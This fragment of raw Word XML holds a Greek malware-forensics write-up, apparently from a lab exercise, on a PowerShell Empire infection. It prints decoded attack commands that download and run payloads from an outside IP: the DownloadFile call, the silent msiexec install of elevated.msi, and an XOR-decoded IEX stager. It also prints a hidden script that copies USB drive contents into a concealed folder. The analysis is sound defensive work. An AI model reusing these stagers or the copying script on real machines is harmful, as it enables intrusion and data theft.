          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) που θα καλέσουν το malware.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 αποκρυπτογράφηση της τελευταίας εντολής δίνει το ξεκάθαρο μήνυμα (download από τον 83.212.111.137) το πρόγραμμα που αναλύθηκε παραπάνω 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(New-Object System.Net.WebClient).DownloadFile('http://83.212.111.137/down/empire-script.ps1','c:\users\public\priv_add_pers.ps1')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Σημείο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Λίγο αργότερα (με βάση τα logs) καλείτε το παρακάτω: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5943600" cy="1536700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ENCRYPTED</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 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Stopped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Available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NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=15 HostName=ConsoleHost HostVersion=4.0 HostId=464d3ecd-439a-4bd4-b682-983c682af70c HostApplication=powershell.exe -NoP -NonI -W Hidden -Enc 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 EngineVersion=4.0 RunspaceId=ad5efe1f-07a5-4a54-85d9-b9dcb9722a00 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=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Αφού αποκρυπτογραφήσουμε και αυτό βλέπουμε ότι εκτελείτε ο εξής κώδικας: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mkdir -force $env:TEMP\TCD506A_.tmp;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Invoke-WebRequest "http://83.212.111.137/down/elevated.msi" -OutFile "$env:TEMP\TCD506A_.tmp\elevated.msi";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msiexec /q /i "$env:TEMP\TCD506A_.tmp\elevated.msi";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Δηλαδή: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Δημιουργείται ένας κατάλογος στον temp κατάλογο του χρήστη με το όνομα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TCD506A_.tmp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Κατεβαίνει (το πρόγραμμα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TEMP\TCD506A_.tmp\elevated.msi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) σε αυτόν τον κατάλογο από την διεύθυνση</w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId20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rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://83.212.111.137/down/elevated.msi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Εγκαθίσταται το πρόγραμμα μέσω του προγράμματος εγκατάστασης των Windows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msiexec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Πράγματι στον αντίστοιχο κατάλογο υπάρχει ακόμα αυτό το πρόγραμμα.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5486400" cy="17335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Το VirusTotal δίνει 1/56 (χαμηλό) με αναφορά όμως σε Trojan!!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5486400" cy="32004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ΑΝΑΛΥΣΗ ΤΟΥ ELEVATED.MSI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422400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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270000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Installation/Persistance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right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Creates/touches files in windows directory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right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details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right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"WINWORD.EXE" created file "%WINDIR%\Globalization\Sorting\sortdefault.nls"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right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"WINWORD.EXE" created file "C:\Windows\Fonts\staticcache.dat"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right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"WINWORD.EXE" created file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"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right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"WINWORD.EXE" created file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"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right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"WINWORD.EXE" created file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"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right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"WINWORD.EXE" created file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"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right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"WINWORD.EXE" created file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"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right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"WINWORD.EXE" created file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"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right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"WINWORD.EXE" created file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"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right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"WINWORD.EXE" created file "%LOCALAPPDATA%\Microsoft\Windows\Caches"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right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"WINWORD.EXE" created file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"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right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"WINWORD.EXE" created file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"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right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"WINWORD.EXE" created file "C:\Windows\system32\rsaenh.dll"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right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"WINWORD.EXE" created file "C:\Windows\system32\en-US\KERNELBASE.dll.mui"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right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"WINWORD.EXE" created file "C:\Windows\System32\msxml6r.dll"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right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"WINWORD.EXE" created file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{77122DCE-0CEE-4F2E-8AA5-4922A9D3726E}.tmp"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right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"WINWORD.EXE" created file "C:\Windows\system32\en-US\MSCTF.dll.mui"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right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"WINWORD.EXE" created file "C:\Windows\system32\en-US\mlang.dll.mui"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right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"WINWORD.EXE" created file "C:\Windows\system32\mlang.dat"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right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"WINWORD.EXE" created file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0000.doc"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right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source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right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API Call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hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:b w:val="1"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Contains embedded string with suspicious keywords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details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Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)"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Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"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Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"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Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"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Found suspicious keyword "Environ" which indicates: "May read system environment variables"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Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"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hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:b w:val="1"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Installs hooks/patches the running process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details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"WINWORD.EXE" wrote bytes "e99e4834f0" to virtual address "0x76D63D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")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"WINWORD.EXE" wrote bytes "8e95cabd" to virtual address "0x6963CA70" (part of module "GFX.DLL")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"WINWORD.EXE" wrote bytes "efb8f0bd" to virtual address "0x699BF530" (part of module "WWLIB.DLL")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"WINWORD.EXE" wrote bytes "0bcf42ba" to virtual address "0x2FBE1B94" (part of module "WINWORD.EXE")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"WINWORD.EXE" wrote bytes "62c960bc" to virtual address "0x62329904" (part of module "RICHED20.DLL")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"WINWORD.EXE" wrote bytes "88c406bc" to virtual address "0x624310AC" (part of module "MSPTLS.DLL")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"WINWORD.EXE" wrote bytes "70e65fbe" to virtual address "0x67300BA8" (part of module "MSO.DLL")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"WINWORD.EXE" wrote bytes "c4cad57680bbd57652bad5769fbbd57608bbd57646ced5766138d676de2fd676d0d9d576000000001779a9764f91a9767f6fa976f4f7a97611f7a976f283a976857ea97600000000" to virtual address "0x6ADB1000" (part of module "MSIMG32.DLL")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"WINWORD.EXE" wrote bytes "fbd0cdbd" to virtual address "0x683078E4" (part of module "OART.DLL")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Σημείο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Επίσης, καλείτε το παρακάτω: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787900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Δηλαδή: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ProviderName=Function NewProviderState=Started SequenceNumber=7 HostName=ConsoleHost HostVersion=4.0 HostId=207b858a-3d53-46be-ab3e-1a039a19216d HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -ExecutionPolicy Bypass -NonInteractive -InputFormat None -NoProfile -File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C:\Program Files\Zoosk\empire_script.ps1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EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=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Πονηρό πρόγραμμα το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C:\Program Files\Zoosk\empire_script.ps1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Σημείο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Καλείτε το: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ProviderName=Registry NewProviderState=Started SequenceNumber=9 HostName=ConsoleHost HostVersion=4.0 HostId=a81d8166-8122-4a8e-95d3-9dab99fc76ca HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -InputFormat None -Enc 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 EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=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Δηλαδή το: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$WC=NEw-ObjecT SystEm.NeT.WEBCLiENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HeAdERS.ADD('User-Agent',$u);$Wc.PROxy = [SYSteM.Net.WEbRequESt]::DEFaUlTWebProxY;$wc.PrOxy.CRedENtiALS = [SYstEM.Net.CrEDenTIalCAche]::DeFaultNEtWoRKCrEDentiaLS;$K='ev\/lXc6kVWZ:[@#NrpH;dw|n0,JBST]';$I=0;[cHAr[]]$B=([cHAr[]]($wC.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DOwnLOADSTring("http://83.212.111.137:8080/index.asp"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)))|%{$_-BXOR$K[$I++%$K.LenGth]};IEX ($B-joIn'')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Σημείο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Αφού κετέβει το index.asp καλείτε το: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ProviderName=Function NewProviderState=Started SequenceNumber=7 HostName=ConsoleHost HostVersion=4.0 HostId=de996510-4b2a-4cfe-9866-100083307c7e HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass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C:\users\IEUser\appdata\local\temp\tr.ps1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EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=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Πράγματι υπάρχει στον κατάλογο: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743200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Περέχει τον εξής κώδικα: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#Requires -version 2.0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function Recursion ([string]$filePath, [string]$FolderName) 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$GetRemovableFolder=get-childitem $filepath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#$FolderToWrite=$FolderName +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#write-host $FolderName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foreach($item in $GetRemovableFolder){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if ( $item.extension -ne ".exe" -and $item.extension -ne ".avi" -and $item.length -lt 50MB -and $item.attributes -ne 'directory'){ #exclude some file types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$NewFullFileName=$FolderName +$item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if ((Test-Path $NewFullFileName)){ #the file exist, i need to check it's size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if ((Get-item $NewFullFileName).length  -ne $item.length){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Copy-item $item.FullName $FolderName -force -ErrorAction SilentlyContinue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else{#write-host "exist"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}</w:t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{</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Copy-item $item.FullName $FolderName -force -ErrorAction SilentlyContinue #it is not exist so i copy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if ($item.attributes -eq 'directory'){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Copy-item $item.FullName $folderName  -ErrorAction SilentlyContinue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#$RelativePathtoCopy=$item.FullName.split(':')[-1]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$RelativePathtoCopy=$folderName+$item.Name+"\"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Recursion $item.FullName  $RelativePathtoCopy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Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange -ErrorAction SilentlyContinue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#write-host (get-date -format s) " the script is starting..."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do{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$newEvent = Wait-Event -SourceIdentifier volumeChange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$eventType = $newEvent.SourceEventArgs.NewEvent.EventType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#write-host (get-date -format s) " new event = " $eventTypeName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 ($eventType -eq 2)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$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName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$VolumeSerialNumber=([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeSerialNumber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#write-host $VolumeSerialNumber +"VolumeSerialNumber"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$usb=[System.IO.DriveInfo]::GetDrives()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$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName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#write-host (get-date -format s) " Drive name = " $driveLetter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#write-host (get-date -format s) " Drive label = " $driveLabel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 ($usb.driveType -eq 'Removable')#start process with specific conditions)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#write-host (get-date -format s) " iam starting copy process in 13 seconds..."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start-sleep -seconds 13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#start-process "Z:\myproceess.bat"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#$usb=[System.IO.DriveInfo]::GetDrives()|?{$_.driveType -eq "Removable"}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$NewFolderName=$VolumeSerialNumber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$NewFolderName="c:\users\public\copyremovableitems\"+ $NewFolderName +"\"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mkdir $NewFolderName -ErrorAction SilentlyContinue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(get-item -force c:\users\public\copyremovableitems\).attributes='Hidden'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Recursion $driveLetter $NewFolderName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Remove-Event -SourceIdentifier volumeChange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 while (1-eq1) #Loop until next event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Unregister-Event -SourceIdentifier volumeChange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Το παραπάνω πρόγραμμα αντιγράφει στον κατάλογο C:\Users\Public\copyremovableitems τα αρχεία που παραθέτουμε στην παρακάτω εικόνα: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75946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Στα αρχεία secret-file.docx δεν παρατηρήθηκε κάτι ιδιαίτερο. Περιείχαν επαιδευτικό κείμενο από την διεύθυνση:  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="006621"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e-learning.sch.gr/mod/resource/view.php?id=29766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ΕΠΙΣΗΣ εκτελούνται τα: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ProviderName=Function NewProviderState=Started SequenceNumber=7 HostName=ConsoleHost HostVersion=4.0 HostId=b4b1f678-971b-4825-989c-6afb0af1ca6f HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass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 ./copyfrom.ps1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EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=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NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=15 HostName=ConsoleHost HostVersion=4.0 HostId=97c37a2b-beee-40fb-8939-e101df80d741 HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass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 ./RecursionAllOne.ps1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EngineVersion=4.0 RunspaceId=17b08e3c-d751-4438-b5bd-40acbe07ec70 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=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Τα παραπάνω αρχεία δεν βρέθηκαν στον δίσκο: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0099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Επίσης παρατηρείται οτι κάθε ένα λεπτό “ξυπνά” η διεργασία με το όνομα </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dwmss.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> η οποία συνδέεται με τον server okeanos.grnet.gr με ασφαλή σύνδεση (Https) όπου στέλνονται κάποια πακέτα.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800100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="18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Ενδιαφέρον αποτελεί το γεγονός οτι το path της διεργασίας αναφερεται ως το C:\Program Files\Common Files\Services\dwmss.exe το οποίο όμως δεν είναι προσπελάσιμο ούτε και ορατό.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743450" cy="2590800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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83.212.111.137/down/elevated.msi" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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9.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hybrid-analysis.com/sample/2bbf8f4753c4dbd369b18bdff50776d4d3527a97244673e85590e44b91436fb6?environmentId=100#details-2-2-hooks-8" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hybrid-analysis.com/sample/2bbf8f4753c4dbd369b18bdff50776d4d3527a97244673e85590e44b91436fb6?environmentId=100#details-2-1-string-21" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image01.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://83.212.111.137:8080/index.asp" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://83.212.111.137:8080/index.asp" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://83.212.111.137/down/elevated.msi" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>